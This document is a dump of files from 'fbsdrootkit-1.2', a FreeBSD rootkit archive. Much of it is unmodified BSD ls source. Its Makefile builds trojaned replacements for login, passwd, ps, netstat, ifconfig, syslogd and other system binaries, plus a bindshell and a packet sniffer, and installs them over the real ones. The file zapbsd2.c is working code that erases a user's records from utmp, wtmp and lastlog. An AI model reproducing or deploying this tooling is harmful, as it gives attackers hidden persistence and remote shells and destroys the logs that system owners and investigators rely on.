(Berkeley) 5/31/93 * $Id: ls.h,v 1.2 1994/09/24 02:55:55 davidg Exp $ */ #define NO_PRINT 1 extern long blocksize; /* block size units */ extern int f_accesstime; /* use time of last access */ extern int f_flags; /* show flags associated with a file */ extern int f_inode; /* print inode */ extern int f_longform; /* long listing format */ extern int f_sectime; /* print the real time for all files */ extern int f_size; /* list size in short listing */ extern int f_statustime; /* use time of last mode change */ extern int f_type; /* add type character for non-regular files */ typedef struct { FTSENT *list; u_long btotal; int bcfile; int entries; int maxlen; int s_block; int s_flags; int s_group; int s_inode; int s_nlink; int s_size; int s_user; } DISPLAY; typedef struct { char *user; char *group; char *flags; char data[1]; } NAMES; fbsdrootkit-1.2/ls/print.c100600 764 764 16532 6155174045 13107 0ustar dfdf/* * Copyright (c) 1989, 1993, 1994 * The Regents of the University of California. All rights reserved. * * This code is derived from software contributed to Berkeley by * Michael Fischbein. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: print.c,v 1.4.4.3 1996/06/05 02:35:42 jkh Exp $ */ #ifndef lint static char sccsid[] = "@(#)print.c 8.4 (Berkeley) 4/17/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include "ls.h" #include "extern.h" static int printaname __P((FTSENT *, u_long, u_long)); static void printlink __P((FTSENT *)); static void printtime __P((time_t)); static int printtype __P((u_int)); #define IS_NOPRINT(p) ((p)->fts_number == NO_PRINT) void printscol(dp) DISPLAY *dp; { FTSENT *p; for (p = dp->list; p; p = p->fts_link) { if (IS_NOPRINT(p)) continue; (void)printaname(p, dp->s_inode, dp->s_block); (void)putchar('\n'); } } void printlong(dp) DISPLAY *dp; { struct stat *sp; FTSENT *p; NAMES *np; char buf[20]; if (dp->list->fts_level != FTS_ROOTLEVEL && (f_longform || f_size)) (void)printf("total %lu\n", howmany(dp->btotal, blocksize)); for (p = dp->list; p; p = p->fts_link) { if (IS_NOPRINT(p)) continue; sp = p->fts_statp; if (f_inode) (void)printf("%*lu ", dp->s_inode, sp->st_ino); if (f_size) (void)printf("%*qd ", dp->s_block, howmany(sp->st_blocks, blocksize)); (void)strmode(sp->st_mode, buf); np = p->fts_pointer; (void)printf("%s %*u %-*s %-*s ", buf, dp->s_nlink, sp->st_nlink, dp->s_user, np->user, dp->s_group, np->group); if (f_flags) (void)printf("%-*s ", dp->s_flags, np->flags); if (S_ISCHR(sp->st_mode) || S_ISBLK(sp->st_mode)) (void)printf("%3d, %3d ", major(sp->st_rdev), minor(sp->st_rdev)); else if (dp->bcfile) (void)printf("%*s%*qd ", 8 - dp->s_size, "", dp->s_size, sp->st_size); else (void)printf("%*qd ", dp->s_size, sp->st_size); if (f_accesstime) printtime(sp->st_atime); else if (f_statustime) printtime(sp->st_ctime); else printtime(sp->st_mtime); (void)printf("%s", p->fts_name); if (f_type) (void)printtype(sp->st_mode); if (S_ISLNK(sp->st_mode)) printlink(p); (void)putchar('\n'); } } #define TAB 8 void printcol(dp) DISPLAY *dp; { extern int termwidth; static FTSENT **array; static int lastentries = -1; FTSENT *p; int base, chcnt, cnt, col, colwidth, num; int endcol, numcols, numrows, row; /* * Have to do random access in the linked list -- build a table * of pointers. */ if (dp->entries > lastentries) { lastentries = dp->entries; if ((array = realloc(array, dp->entries * sizeof(FTSENT *))) == NULL) { warn(NULL); printscol(dp); } } for (p = dp->list, num = 0; p; p = p->fts_link) if (p->fts_number != NO_PRINT) array[num++] = p; colwidth = dp->maxlen; if (f_inode) colwidth += dp->s_inode + 1; if (f_size) colwidth += dp->s_block + 1; if (f_type) colwidth += 1; colwidth = (colwidth + TAB) & ~(TAB - 1); if (termwidth < 2 * colwidth) { printscol(dp); return; } numcols = termwidth / colwidth; numrows = num / numcols; if (num % numcols) ++numrows; if (dp->list->fts_level != FTS_ROOTLEVEL && (f_longform || f_size)) (void)printf("total %lu\n", howmany(dp->btotal, blocksize)); for (row = 0; row < numrows; ++row) { endcol = colwidth; for (base = row, chcnt = col = 0; col < numcols; ++col) { chcnt += printaname(array[base], dp->s_inode, dp->s_block); if ((base += numrows) >= num) break; while ((cnt = ((chcnt + TAB) & ~(TAB - 1))) <= endcol){ (void)putchar('\t'); chcnt = cnt; } endcol += colwidth; } (void)putchar('\n'); } } /* * print [inode] [size] name * return # of characters printed, no trailing characters. */ static int printaname(p, inodefield, sizefield) FTSENT *p; u_long sizefield, inodefield; { struct stat *sp; int chcnt; sp = p->fts_statp; chcnt = 0; if (f_inode) chcnt += printf("%*lu ", (int)inodefield, sp->st_ino); if (f_size) chcnt += printf("%*qd ", (int)sizefield, howmany(sp->st_blocks, blocksize)); chcnt += printf("%s", p->fts_name); if (f_type) chcnt += printtype(sp->st_mode); return (chcnt); } static void printtime(ftime) time_t ftime; { int i; char longstring[80]; strftime(longstring, sizeof(longstring), "%c", localtime(&ftime)); for (i = 4; i < 11; ++i) (void)putchar(longstring[i]); #define SIXMONTHS ((365 / 2) * 86400) if (f_sectime) for (i = 11; i < 24; i++) (void)putchar(longstring[i]); else if (ftime + SIXMONTHS > time(NULL)) for (i = 11; i < 16; ++i) (void)putchar(longstring[i]); else { (void)putchar(' '); for (i = 20; i < 24; ++i) (void)putchar(longstring[i]); } (void)putchar(' '); } static int printtype(mode) u_int mode; { switch (mode & S_IFMT) { case S_IFDIR: (void)putchar('/'); return (1); case S_IFIFO: (void)putchar('|'); return (1); case S_IFLNK: (void)putchar('@'); return (1); case S_IFSOCK: (void)putchar('='); return (1); } if (mode & (S_IXUSR | S_IXGRP | S_IXOTH)) { (void)putchar('*'); return (1); } return (0); } static void printlink(p) FTSENT *p; { int lnklen; char name[MAXPATHLEN + 1], path[MAXPATHLEN + 1]; if (p->fts_level == FTS_ROOTLEVEL) (void)snprintf(name, sizeof(name), "%s", p->fts_name); else (void)snprintf(name, sizeof(name), "%s/%s", p->fts_parent->fts_accpath, p->fts_name); if ((lnklen = readlink(name, path, sizeof(path) - 1)) == -1) { (void)fprintf(stderr, "\nls: %s: %s\n", name, strerror(errno)); return; } path[lnklen] = '\0'; (void)printf(" -> %s", path); } fbsdrootkit-1.2/ls/stat_flags.c100600 764 764 10224 5640712475 14075 0ustar dfdf/*- * Copyright (c) 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: stat_flags.c,v 1.2 1994/09/24 02:55:57 davidg Exp $ */ #ifndef lint static char sccsid[] = "@(#)stat_flags.c 8.1 (Berkeley) 5/31/93"; #endif /* not lint */ #include #include #include #include #define SAPPEND(s) { \ if (prefix != NULL) \ (void)strcat(string, prefix); \ (void)strcat(string, s); \ prefix = ","; \ } /* * flags_to_string -- * Convert stat flags to a comma-separated string. If no flags * are set, return the default string. */ char * flags_to_string(flags, def) u_long flags; char *def; { static char string[128]; char *prefix; string[0] = '\0'; prefix = NULL; if (flags & UF_APPEND) SAPPEND("uappnd"); if (flags & UF_IMMUTABLE) SAPPEND("uchg"); if (flags & UF_NODUMP) SAPPEND("nodump"); if (flags & SF_APPEND) SAPPEND("sappnd"); if (flags & SF_ARCHIVED) SAPPEND("arch"); if (flags & SF_IMMUTABLE) SAPPEND("schg"); return (prefix == NULL && def != NULL ? def : string); } #define TEST(a, b, f) { \ if (!memcmp(a, b, sizeof(b))) { \ if (clear) { \ if (clrp) \ *clrp |= (f); \ } else if (setp) \ *setp |= (f); \ break; \ } \ } /* * string_to_flags -- * Take string of arguments and return stat flags. Return 0 on * success, 1 on failure. On failure, stringp is set to point * to the offending token. */ int string_to_flags(stringp, setp, clrp) char **stringp; u_long *setp, *clrp; { int clear; char *string, *p; clear = 0; if (setp) *setp = 0; if (clrp) *clrp = 0; string = *stringp; while ((p = strsep(&string, "\t ,")) != NULL) { *stringp = p; if (*p == '\0') continue; if (p[0] == 'n' && p[1] == 'o') { clear = 1; p += 2; } switch (p[0]) { case 'a': TEST(p, "arch", SF_ARCHIVED); TEST(p, "archived", SF_ARCHIVED); return (1); case 'd': clear = !clear; TEST(p, "dump", UF_NODUMP); return (1); case 's': TEST(p, "sappnd", SF_APPEND); TEST(p, "sappend", SF_APPEND); TEST(p, "schg", SF_IMMUTABLE); TEST(p, "schange", SF_IMMUTABLE); TEST(p, "simmutable", SF_IMMUTABLE); return (1); case 'u': TEST(p, "uappnd", UF_APPEND); TEST(p, "uappend", UF_APPEND); TEST(p, "uchg", UF_IMMUTABLE); TEST(p, "uchange", UF_IMMUTABLE); TEST(p, "uimmutable", UF_IMMUTABLE); /* FALLTHROUGH */ default: return (1); } } return (0); } fbsdrootkit-1.2/ls/util.c100600 764 764 4707 6155174045 12711 0ustar dfdf/* * Copyright (c) 1989, 1993, 1994 * The Regents of the University of California. All rights reserved. * * This code is derived from software contributed to Berkeley by * Michael Fischbein. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: util.c,v 1.4.6.2 1996/06/05 02:35:42 jkh Exp $ */ #ifndef lint static char sccsid[] = "@(#)util.c 8.3 (Berkeley) 4/2/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include "ls.h" #include "extern.h" void prcopy(src, dest, len) char *src, *dest; int len; { int ch; while (len--) { ch = *src++; *dest++ = isprint(ch) ? ch : '?'; } } void usage() { (void)fprintf(stderr, "usage: ls [-1ACFLRTacdfiklqrstu] [file ...]\n"); exit(1); } fbsdrootkit-1.2/ls/ls.c.dist100600 764 764 32166 6247420102 13322 0ustar dfdf/* * Copyright (c) 1989, 1993, 1994 * The Regents of the University of California. All rights reserved. * * This code is derived from software contributed to Berkeley by * Michael Fischbein. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $Id: ls.c,v 1.6.4.2 1996/06/05 02:35:41 jkh Exp $ */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1989, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)ls.c 8.5 (Berkeley) 4/2/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include #include "ls.h" #include "extern.h" static void display __P((FTSENT *, FTSENT *)); static int mastercmp __P((const FTSENT **, const FTSENT **)); static void traverse __P((int, char **, int)); static void (*printfcn) __P((DISPLAY *)); static int (*sortfcn) __P((const FTSENT *, const FTSENT *)); long blocksize; /* block size units */ int termwidth = 80; /* default terminal width */ /* flags */ int f_accesstime; /* use time of last access */ int f_column; /* columnated format */ int f_flags; /* show flags associated with a file */ int f_inode; /* print inode */ int f_kblocks; /* print size in kilobytes */ int f_listdir; /* list actual directory, not contents */ int f_listdot; /* list files beginning with . */ int f_longform; /* long listing format */ int f_newline; /* if precede with newline */ int f_nonprint; /* show unprintables as ? */ int f_nosort; /* don't sort output */ int f_recursive; /* ls subdirectories also */ int f_reversesort; /* reverse whatever sort is used */ int f_sectime; /* print the real time for all files */ int f_singlecol; /* use single column output */ int f_size; /* list size in short listing */ int f_statustime; /* use time of last mode change */ int f_dirname; /* if precede with directory name */ int f_timesort; /* sort by time vice name */ int f_type; /* add type character for non-regular files */ int main(argc, argv) int argc; char *argv[]; { static char dot[] = ".", *dotav[] = { dot, NULL }; struct winsize win; int ch, fts_options, notused; char *p; /* Terminal defaults to -Cq, non-terminal defaults to -1. */ if (isatty(STDOUT_FILENO)) { if (ioctl(STDOUT_FILENO, TIOCGWINSZ, &win) == -1 || !win.ws_col) { if ((p = getenv("COLUMNS")) != NULL) termwidth = atoi(p); } else termwidth = win.ws_col; f_column = f_nonprint = 1; } else { f_singlecol = 1; /* retrieve environment variable, in case of explicit -C */ if ((p = getenv("COLUMNS"))) termwidth = atoi(p); } /* Root is -A automatically. */ if (!getuid()) f_listdot = 1; fts_options = FTS_PHYSICAL; while ((ch = getopt(argc, argv, "1ACFLRTacdfgikloqrstu")) != EOF) { switch (ch) { /* * The -1, -C and -l options all override each other so shell * aliasing works right. */ case '1': f_singlecol = 1; f_column = f_longform = 0; break; case 'C': f_column = 1; f_longform = f_singlecol = 0; break; case 'l': f_longform = 1; f_column = f_singlecol = 0; break; /* The -c and -u options override each other. */ case 'c': f_statustime = 1; f_accesstime = 0; break; case 'u': f_accesstime = 1; f_statustime = 0; break; case 'F': f_type = 1; break; case 'L': fts_options &= ~FTS_PHYSICAL; fts_options |= FTS_LOGICAL; break; case 'R': f_recursive = 1; break; case 'a': fts_options |= FTS_SEEDOT; /* FALLTHROUGH */ case 'A': f_listdot = 1; break; /* The -d option turns off the -R option. */ case 'd': f_listdir = 1; f_recursive = 0; break; case 'f': f_nosort = 1; break; case 'g': /* Compatibility with 4.3BSD. */ break; case 'i': f_inode = 1; break; case 'k': f_kblocks = 1; break; case 'o': f_flags = 1; break; case 'q': f_nonprint = 1; break; case 'r': f_reversesort = 1; break; case 's': f_size = 1; break; case 'T': f_sectime = 1; break; case 't': f_timesort = 1; break; default: case '?': usage(); } } argc -= optind; argv += optind; /* * If not -F, -i, -l, -s or -t options, don't require stat * information. */ if (!f_inode && !f_longform && !f_size && !f_timesort && !f_type) fts_options |= FTS_NOSTAT; /* * If not -F, -d or -l options, follow any symbolic links listed on * the command line. */ if (!f_longform && !f_listdir && !f_type) fts_options |= FTS_COMFOLLOW; /* If -l or -s, figure out block size. */ if (f_longform || f_size) { if (f_kblocks) blocksize = 2; else { (void)getbsize(¬used, &blocksize); blocksize /= 512; } } /* Select a sort function. */ if (f_reversesort) { if (!f_timesort) sortfcn = revnamecmp; else if (f_accesstime) sortfcn = revacccmp; else if (f_statustime) sortfcn = revstatcmp; else /* Use modification time. */ sortfcn = revmodcmp; } else { if (!f_timesort) sortfcn = namecmp; else if (f_accesstime) sortfcn = acccmp; else if (f_statustime) sortfcn = statcmp; else /* Use modification time. */ sortfcn = modcmp; } /* Select a print function. */ if (f_singlecol) printfcn = printscol; else if (f_longform) printfcn = printlong; else printfcn = printcol; if (argc) traverse(argc, argv, fts_options); else traverse(1, dotav, fts_options); exit(0); } static int output; /* If anything output. */ /* * Traverse() walks the logical directory structure specified by the argv list * in the order specified by the mastercmp() comparison function. During the * traversal it passes linked lists of structures to display() which represent * a superset (may be exact set) of the files to be displayed. */ static void traverse(argc, argv, options) int argc, options; char *argv[]; { FTS *ftsp; FTSENT *p, *chp; int ch_options; if ((ftsp = fts_open(argv, options, f_nosort ? NULL : mastercmp)) == NULL) err(1, NULL); display(NULL, fts_children(ftsp, 0)); if (f_listdir) return; /* * If not recursing down this tree and don't need stat info, just get * the names. */ ch_options = !f_recursive && options & FTS_NOSTAT ? FTS_NAMEONLY : 0; while ((p = fts_read(ftsp)) != NULL) switch (p->fts_info) { case FTS_DC: warnx("%s: directory causes a cycle", p->fts_name); break; case FTS_DNR: case FTS_ERR: warnx("%s: %s", p->fts_name, strerror(p->fts_errno)); break; case FTS_D: if (p->fts_level != FTS_ROOTLEVEL && p->fts_name[0] == '.' && !f_listdot) break; /* * If already output something, put out a newline as * a separator. If multiple arguments, precede each * directory with its name. */ if (output) (void)printf("\n%s:\n", p->fts_path); else if (argc > 1) { (void)printf("%s:\n", p->fts_path); output = 1; } chp = fts_children(ftsp, ch_options); display(p, chp); if (!f_recursive && chp != NULL) (void)fts_set(ftsp, p, FTS_SKIP); break; } if (errno) err(1, "fts_read"); } /* * Display() takes a linked list of FTSENT structures and passes the list * along with any other necessary information to the print function. P * points to the parent directory of the display list. */ static void display(p, list) FTSENT *p, *list; { struct stat *sp; DISPLAY d; FTSENT *cur; NAMES *np; u_quad_t maxsize; u_long btotal, maxblock, maxinode, maxlen, maxnlink; int bcfile, flen, glen, ulen, maxflags, maxgroup, maxuser; int entries, needstats; char *user, *group, *flags, buf[20]; /* 32 bits == 10 digits */ /* * If list is NULL there are two possibilities: that the parent * directory p has no children, or that fts_children() returned an * error. We ignore the error case since it will be replicated * on the next call to fts_read() on the post-order visit to the * directory p, and will be signalled in traverse(). */ if (list == NULL) return; needstats = f_inode || f_longform || f_size; flen = 0; btotal = maxblock = maxinode = maxlen = maxnlink = 0; bcfile = 0; maxuser = maxgroup = maxflags = 0; flags = NULL; maxsize = 0; for (cur = list, entries = 0; cur; cur = cur->fts_link) { if (cur->fts_info == FTS_ERR || cur->fts_info == FTS_NS) { warnx("%s: %s", cur->fts_name, strerror(cur->fts_errno)); cur->fts_number = NO_PRINT; continue; } /* * P is NULL if list is the argv list, to which different rules * apply. */ if (p == NULL) { /* Directories will be displayed later. */ if (cur->fts_info == FTS_D && !f_listdir) { cur->fts_number = NO_PRINT; continue; } } else { /* Only display dot file if -a/-A set. */ if (cur->fts_name[0] == '.' && !f_listdot) { cur->fts_number = NO_PRINT; continue; } } if (f_nonprint) prcopy(cur->fts_name, cur->fts_name, cur->fts_namelen); if (cur->fts_namelen > maxlen) maxlen = cur->fts_namelen; if (needstats) { sp = cur->fts_statp; if (sp->st_blocks > maxblock) maxblock = sp->st_blocks; if (sp->st_ino > maxinode) maxinode = sp->st_ino; if (sp->st_nlink > maxnlink) maxnlink = sp->st_nlink; if (sp->st_size > maxsize) maxsize = sp->st_size; btotal += sp->st_blocks; if (f_longform) { user = user_from_uid(sp->st_uid, 0); if ((ulen = strlen(user)) > maxuser) maxuser = ulen; group = group_from_gid(sp->st_gid, 0); if ((glen = strlen(group)) > maxgroup) maxgroup = glen; if (f_flags) { flags = flags_to_string(sp->st_flags, "-"); if ((flen = strlen(flags)) > maxflags) maxflags = flen; } else flen = 0; if ((np = malloc(sizeof(NAMES) + ulen + glen + flen + 3)) == NULL) err(1, NULL); np->user = &np->data[0]; (void)strcpy(np->user, user); np->group = &np->data[ulen + 1]; (void)strcpy(np->group, group); if (S_ISCHR(sp->st_mode) || S_ISBLK(sp->st_mode)) bcfile = 1; if (f_flags) { np->flags = &np->data[ulen + glen + 2]; (void)strcpy(np->flags, flags); } cur->fts_pointer = np; } } ++entries; } if (!entries) return; d.list = list; d.entries = entries; d.maxlen = maxlen; if (needstats) { d.bcfile = bcfile; d.btotal = btotal; (void)snprintf(buf, sizeof(buf), "%lu", maxblock); d.s_block = strlen(buf); d.s_flags = maxflags; d.s_group = maxgroup; (void)snprintf(buf, sizeof(buf), "%lu", maxinode); d.s_inode = strlen(buf); (void)snprintf(buf, sizeof(buf), "%lu", maxnlink); d.s_nlink = strlen(buf); (void)snprintf(buf, sizeof(buf), "%qu", maxsize); d.s_size = strlen(buf); d.s_user = maxuser; } printfcn(&d); output = 1; if (f_longform) for (cur = list; cur; cur = cur->fts_link) free(cur->fts_pointer); } /* * Ordering for mastercmp: * If ordering the argv (fts_level = FTS_ROOTLEVEL) return non-directories * as larger than directories. Within either group, use the sort function. * All other levels use the sort function. Error entries remain unsorted. */ static int mastercmp(a, b) const FTSENT **a, **b; { int a_info, b_info; a_info = (*a)->fts_info; if (a_info == FTS_ERR) return (0); b_info = (*b)->fts_info; if (b_info == FTS_ERR) return (0); if (a_info == FTS_NS || b_info == FTS_NS) return (namecmp(*a, *b)); if (a_info == b_info) return (sortfcn(*a, *b)); if ((*a)->fts_level == FTS_ROOTLEVEL) if (a_info == FTS_D) return (1); else if (b_info == FTS_D) return (-1); else return (sortfcn(*a, *b)); else return (sortfcn(*a, *b)); } fbsdrootkit-1.2/ls/Makefile.dist100600 764 764 253 6257406031 14136 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/2/93 # $Id: Makefile,v 1.2 1994/09/24 02:55:51 davidg Exp $ PROG= ls SRCS= cmp.c stat_flags.c ls.c print.c util.c .include fbsdrootkit-1.2/Makefile100600 764 764 1622 6273036332 12600 0ustar dfdfSUB=chpass inetd login ls du netstat ifconfig passwd ps rshd syslogd PATHS=/bin/ls /usr/bin/chpass /usr/bin/login /usr/bin/passwd /bin/ps /usr/libexec/rshd /usr/bin/netstat /sbin/ifconfig /usr/sbin/syslogd /usr/sbin/inetd FIX=fix ADLEN=addlen ZAP=zapbsd2 BSHELL=bindshell UTILS=$(FIX) $(ADLEN) $(ZAP) $(BSHELL) SNIFFIT=sniffit.0.3.3 TRIPWIRE=tripwire-1.2 DISTFILE=frk1.1 all: $(UTILS) cd $(SNIFFIT); make freebsd; cd .. for i in $(SUB); do cd $$i; make; strip $$i; cd ..; done $(FIX): $(FIX).o $(CC) -o $@ $(FIX).o $(ADLEN): $(ADLEN).o $(CC) -o $@ $(FIX).o $(ZAP): $(ZAP).o $(CC) -o $@ $(ZAP).o $(BSHELL): $(BSHELL).o $(CC) -o $@ $(BSHELL).o install: @install.sh $(PATHS) clean: rm -f $(UTILS) *.o cd $(SNIFFIT); make clean; cd .. for i in $(SUB); do cd $$i; make clean; cd ..; done dist: @dist.sh $(DISTFILE) tripwire: @dotrip.sh $(PATHS) tripwire-inst: cd $(TRIPWIRE); make rootkit; cd .. fbsdrootkit-1.2/zapbsd2.c100600 764 764 2302 6266057610 12651 0ustar dfdf#include #include #include #include #include #include #include "rootkitutil.h" #define RK_USER argv[1] #define RK_UTMP _PATH_UTMP #define RK_WTMP _PATH_WTMP #define RK_LASTLOG _PATH_LASTLOG #define GET_UID(a) getpwnam(a)->pw_uid /* Cleaned up for the FreeBSD rootkit */ kill_lastlog(uid_t u) { struct lastlog newll; int fd; if((fd=open(RK_LASTLOG,O_RDWR))<0) ERR("open") lseek(fd,u*sizeof(struct lastlog),SEEK_SET); memset(&newll,0xFF,sizeof(newll)); if(write(fd,&newll,sizeof(newll))<0) ERR("write") close(fd); } kill_tmp(char *name,char *who) { int f; struct utmp utmp_ent; if((f=open(name,O_RDWR))<0) ERR("open") while(read(f,&utmp_ent,sizeof(utmp_ent))>0) if(!strncmp(utmp_ent.ut_name,who,strlen(who))) { memset(&utmp_ent,0xFF,sizeof(utmp_ent); lseek(f,-(sizeof(utmp_ent)),SEEK_CUR); if(write(f,&utmp_ent,sizeof(utmp_ent))<0) ERR("write") } close(f); } main(int argc,char **argv) { BASENAME(argv[0]) if(argc!=2) USAGE("username") kill_tmp(RK_UTMP,RK_USER); kill_tmp(RK_WTMP,RK_USER); kill_lastlog(GET_UID(RK_USER)); printf("Zapped %s from %s and %s.\n",RK_USER,RK_UTMP,RK_WTMP); } fbsdrootkit-1.2/du/ 40700 764 764 0 6255624241 11452 5ustar dfdffbsdrootkit-1.2/du/Makefile100600 764 764 107 5571364011 13163 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/6/93 PROG= du .include fbsdrootkit-1.2/du/du.c100600 764 764 15143 6273057530 12352 0ustar dfdf/* * Copyright (c) 1989, 1993, 1994 * The Regents of the University of California. All rights reserved. * * This code is derived from software contributed to Berkeley by * Chris Newcomb. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, 